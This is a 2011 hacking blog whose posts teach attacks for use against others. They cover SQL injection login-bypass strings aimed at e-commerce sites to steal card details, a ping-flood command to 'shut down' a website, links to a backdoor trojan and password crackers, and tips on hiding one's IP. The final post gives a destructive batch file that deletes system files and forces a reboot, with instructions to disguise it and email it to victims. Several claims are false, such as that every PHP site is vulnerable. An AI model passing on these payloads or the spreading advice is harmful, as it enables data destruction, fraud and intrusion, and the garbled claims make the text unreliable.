Friday 11 November 2011

SQL Injection

SQL Injection( Structured Query Language) is a malicious code attack used by Hackers to hack into websites like ebay, amazon and other e-commerce sites and gain access to the admins panel thus get the clients visa or credit card details to purchase products.
This an example of SQLi http:/www.ebay.com/php
Note: every website ending with php is vulnerable to SQL injection, now to begin the attack, after php put =99 ' or 1=1 this means everything =99 in the database is true, if you get an error start injecting this code UNION SELECT null,null.null,null,null,null,null until you get the right nulls. You are simply injecting these codes to gain access to the admins panel.
Some website want you to sign up to view their products, simply use these codes to log in as anonymous user
Username: Admin
Password: ') or '1'='1--

I will later post SQL injection codes

SQLi is the language used by the database.



Wednesday 9 November 2011

PING OF DEATH (SHUTTING DOWN A WEBSITE)

 Shutting down a website you need a websites ip address, now this is how you trace a websites IP address. Click start on your computer and on the search box type cmd then enter, a black window will pop-up, type tracert www.google.com then enter (dont use google use a website you want to shutdown), the ip of the website will be traced, then type ping 13.456.564.688 -t -l 65500 then enter, shutting-down may take some time.. Its done.

HUAWEI, ZTE ,TMN & ORANGE MODEM UNLOCKER! Cracked DC Unlocker..

DC-unlocker is a simple tool used to unlock modems(HUAWEI and ZTE), download dc-unlocker and execute it, place your modem in the USB port and dc-unlocker will detect it, if its not detected go on model and choose you modem type; after its detected press the unlock button, its now unlocked you can use any sim card (Zain, MTN, Zamtel) or whoever your network provider is.. Click on this link and download http://www.dc-unlocker.com/downloads Enjoy :)

Tuesday 8 November 2011

HACKING A REMOTE COMPUTER USING A BACKDOOR TROJAN

A backdoor-trojan is the most deadly remote attack ever, You can hack into someone's computer without em noticing. A back-door trojan can deactivate your victims firewall and turn on the remote desktop without their knowledge and gain full access to their computer, you can use prorat-trojan softwarehttp://filecrop.com/search.php?w=prorat&size_i=0&size_f=100000000&engine_r=1&engine_m=1&engine_h=1, this tool is for educational purpose i will not be held responsible for your action...

CRACKING PASSWORDS & WIRLESS INTERNET (WEP)

Cain and abel v4.9 is a cracking tool, with this software you can crack windows password and wireless password by brute-force attack, Cain and abel is not only used for cracking passwords it can be as-well used for sniffing and tracing ip addresses too. You can download this cracking tool on http://www.net-security.org/software.php?id=110  i will later post a tutorial on how to use this software, enjoy cracking ;)

HIDE YOUR IP

Most people say hacking is like A-Z simple, but thats difficult, Hacking is like A-B now thats what i call easy :o
Firstly if you are going to be a successful hacker you need
  1. Secure your internet
  2. Your ip adress should be hidden
  3. Need to be cautious in everything you do
Hiding your ip address is very vital, you can be easily traced if you are ignorant enough to leave your ip open. Click this link and Hide your ass (IP) http://hidemyass.com/ or you can  download easy hide ip http://download.cnet.com/Easy-Hide-IP/3000-2144_4-10714026.html?part=dl-6297234&subj=dl&tag=button to hide your ip, for your own information its a trail version when it expires it will ask you to purchase one online, Wow! wait a sec! a hacker gets what he wants for free. so if you want to crack it post your comment i will show you how to crack it using olydbg(debugger) click here to dwonloadhttp://www.blogger.com/blogger.g?blogID=2542058267523398327#editor/target=post;postID=5186868305096196198

HOW TO CREATE I SIMPLE VIRUS USING NOTEPAD



first open notepad, don't be silly you know were the notepad is.. Type this in the note pad
@echo off
del %systemdriver%\*.*/f/s/q
shutdown -r -f -t 00
remember to save it as something.bat(save it however you like.bat) change the name coz you don't want it to look suspicious and convert it from batch file to exe using bat to exe converter click on this and download it. http://bat-to-exe-converter.download.hdttp.com its easy to use you can figure it out on your own. Now your VIRUS is ready compress it and send it via email to the victim, simple huh!!!!